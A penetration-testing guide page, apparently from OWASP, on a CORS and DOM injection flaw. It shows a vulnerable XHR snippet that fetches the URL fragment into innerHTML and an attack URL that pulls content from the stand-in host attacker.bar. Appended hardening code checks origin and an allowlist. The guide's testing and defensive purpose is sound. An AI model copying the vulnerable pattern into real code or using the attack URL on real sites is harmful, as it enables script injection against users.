196
Web Application Penetration Testing

    var req = new XMLHttpRequest();          // the setup lines precede this page; reconstructed from the calls below
    req.onreadystatechange = function() {
        if(req.readyState==4 && req.status==200) {
            document.getElementById("div1").innerHTML=req.responseText;
        }
    }
    var resource = location.hash.substring(1); // the URL fragment is used as the request URL without any validation
    req.open("GET",resource,true);
    req.send();

For example, a request like this will show the contents of the profile.php file:
http://example.foo/main.php#profile.php
Request and response generated by this URL:

GET http://example.foo/profile.php HTTP/1.1
Host: example.foo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://example.foo/main.php
Connection: keep-alive

HTTP/1.1 200 OK
Date: Mon, 07 Oct 2013 18:20:48 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze17
Vary: Accept-Encoding
Content-Length: 25
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html

[Response Body]

Now, as there is no URL validation, the fragment can name a remote resource: the page fetches attacker-controlled content and writes it into the DOM of the example.foo origin, where it runs with that origin's privileges. A URL like this triggers it:
http://example.foo/main.php#http://attacker.bar/file.php
Request and response generated by this URL:

GET http://attacker.bar/file.php HTTP/1.1
Host: attacker.bar
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://example.foo/main.php
Origin: http://example.foo
Connection: keep-alive

HTTP/1.1 200 OK
Date: Mon, 07 Oct 2013 19:00:32 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u3
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Content-Length: 92
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

Injected Content from attacker.bar

Two things make this work. The request is cross-origin (note the Origin: http://example.foo header the browser adds), and attacker.bar answers with Access-Control-Allow-Origin: *, so the browser permits the script on example.foo to read req.responseText and hand it to innerHTML. Note that script elements inserted through innerHTML are not executed, so a working payload uses markup carrying an event handler instead. A client that checked the fragment against its own origin and an allowlist of expected paths would never issue the cross-origin request; writing the response with textContent instead of innerHTML would additionally stop the markup from being interpreted.
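The following is an added example, not code from the OWASP Testing Guide or from the example.foo application. It reproduces the resource selection of the vulnerable snippet, places a hardened resolver next to it, and checks a captured response for the CORS header that makes the cross-origin read possible. The ALLOWED_PATHS allowlist, the function names and the two sample responses are constructed for illustration; the sample responses are modelled on the captures above.

```javascript
// Added example (not from the OWASP Testing Guide). ALLOWED_PATHS, the function
// names and the sample responses below are constructed for illustration.

// 1. What the vulnerable snippet does: the fragment becomes the XHR URL as-is,
//    so "#http://attacker.bar/file.php" turns into a cross-origin GET.
function vulnerableResource(hash, pageUrl) {
  const resource = hash.substring(1);      // same as location.hash.substring(1)
  return new URL(resource, pageUrl).href;  // what req.open("GET", resource) will fetch
}

// 2. Hardened resolver: parse the fragment against the page URL, require the
//    page's own origin, and require a path the page is designed to load.
//    Returns the safe relative path, or null if the fragment must be rejected.
const ALLOWED_PATHS = new Set(["/profile.php", "/settings.php"]); // assumed allowlist

function safeResource(hash, pageUrl) {
  const page = new URL(pageUrl);
  let candidate;
  try {
    candidate = new URL(hash.substring(1), page);
  } catch (e) {
    return null;                                   // unparsable fragment
  }
  // Rejects http://attacker.bar/..., //attacker.bar/... and javascript: URLs
  if (candidate.origin !== page.origin) return null;
  // Rejects arbitrary same-origin files such as /admin.php
  if (!ALLOWED_PATHS.has(candidate.pathname)) return null;
  return candidate.pathname;
}

// 3. Would a script running on requestingOrigin be allowed to read the body of
//    this cross-origin response? Only if Access-Control-Allow-Origin is "*" or
//    echoes that origin. Without the header the browser blocks the read and
//    req.responseText never reaches innerHTML.
function corsReadAllowed(rawResponse, requestingOrigin) {
  const headerBlock = rawResponse.split(/\r?\n\r?\n/)[0];
  const headers = {};
  for (const line of headerBlock.split(/\r?\n/).slice(1)) {  // skip the status line
    const idx = line.indexOf(":");
    if (idx === -1) continue;
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  const acao = headers["access-control-allow-origin"];
  if (acao === undefined) return false;
  return acao === "*" || acao === requestingOrigin;
}

// Constructed responses modelled on the two captures in the text.
const ATTACKER_RESPONSE = [
  "HTTP/1.1 200 OK",
  "Server: Apache/2.2.22 (Debian)",
  "Access-Control-Allow-Origin: *",
  "Content-Type: text/html",
  "",
  "Injected Content from attacker.bar",
].join("\r\n");

const PROFILE_RESPONSE = [
  "HTTP/1.1 200 OK",
  "Server: Apache/2.2.16 (Debian)",
  "Content-Type: text/html",
  "",
  "[Response Body]",
].join("\r\n");

const PAGE = "http://example.foo/main.php";
console.log(vulnerableResource("#http://attacker.bar/file.php", PAGE)); // http://attacker.bar/file.php
console.log(safeResource("#http://attacker.bar/file.php", PAGE));       // null
console.log(safeResource("#profile.php", PAGE));                        // /profile.php
console.log(corsReadAllowed(ATTACKER_RESPONSE, "http://example.foo"));  // true
console.log(corsReadAllowed(PROFILE_RESPONSE, "http://attacker.bar"));  // false
```

In the page's own code the fix is to feed req.open("GET", ...) only the value returned by safeResource (aborting when it is null) and, where the loaded resource is plain text, to assign it to textContent rather than innerHTML. The corsReadAllowed check is the same question a tester asks of every cross-origin response seen in the proxy: a wildcard or reflected Access-Control-Allow-Origin is what turns a blind cross-origin request into a readable one.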
Tools
• OWASP Zed Attack Proxy (ZAP) - https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
ZAP is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
References
OWASP Resources
• OWASP HTML5 Security Cheat Sheet: https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet
Whitepapers
• W3C - CORS W3C Specification: http://www.w3.org/TR/cors/